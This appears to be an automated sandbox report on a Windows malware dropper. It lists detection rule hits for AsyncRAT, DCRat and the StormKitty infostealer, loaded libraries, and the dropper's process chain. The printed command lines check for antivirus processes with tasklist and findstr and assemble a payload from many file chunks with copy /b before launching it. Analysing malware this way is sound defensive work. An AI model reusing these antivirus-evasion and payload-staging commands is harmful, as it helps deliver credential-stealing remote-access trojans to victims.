                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac | Author: unknown
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR | Matched rule: Detects AsyncRAT | Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A2F28 NtProtectVirtualMemory
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A3368 NtProtectVirtualMemory
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File created: C:\Windows\QueensFa
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File created: C:\Windows\JewelChicks
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File created: C:\Windows\AmountsBarbados
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_0040737E
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_00406EFE
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_004079A2
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_004049A8
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A27A0
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A2F28
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A2792
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_031A2F19
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_07027470
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Code function: 14_2_07020040
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\585711\Depression.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: String function: 004062CF appears 57 times
                    Source: OR8Ti8rf8h.exe | Static PE information: invalid certificate
                    Source: OR8Ti8rf8h.exe, 00000000.00000003.1382590181.00000000006D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs OR8Ti8rf8h.exe
                    Source: OR8Ti8rf8h.exe, 00000000.00000002.1383805544.00000000006D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs OR8Ti8rf8h.exe
                    Source: OR8Ti8rf8h.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@24/54@2/1
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_004024FB CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\7n5rJCiEX08cdKRQsT6vxkbuaZ
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\sG6azeDqzAFWWzxp9qZPJ97vp0eOvHiiJkwqHSTMMTX+wLYD0aKplTVFwtlxkuJivPu7A2SLy039QhNNHaUMKTmGkVQbC2G64/H+EO3TbCY=
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsv2D05.tmp
                    Source: OR8Ti8rf8h.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: tasklist.exe, 00000004.00000002.1409294507.0000000003390000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process"";
                    Source: OR8Ti8rf8h.exe | ReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | File read: C:\Users\user\Desktop\OR8Ti8rf8h.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\OR8Ti8rf8h.exe "C:\Users\user\Desktop\OR8Ti8rf8h.exe"
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585711
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\585711\Depression.com Depression.com Y
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Process created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: shfolder.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: riched20.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: usp10.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: msls31.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: textinputframework.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: aclayers.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: devenum.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msdmo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: OR8Ti8rf8h.exeStatic file information: File size 3391331 > 1048576
                    Source: OR8Ti8rf8h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdbP source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
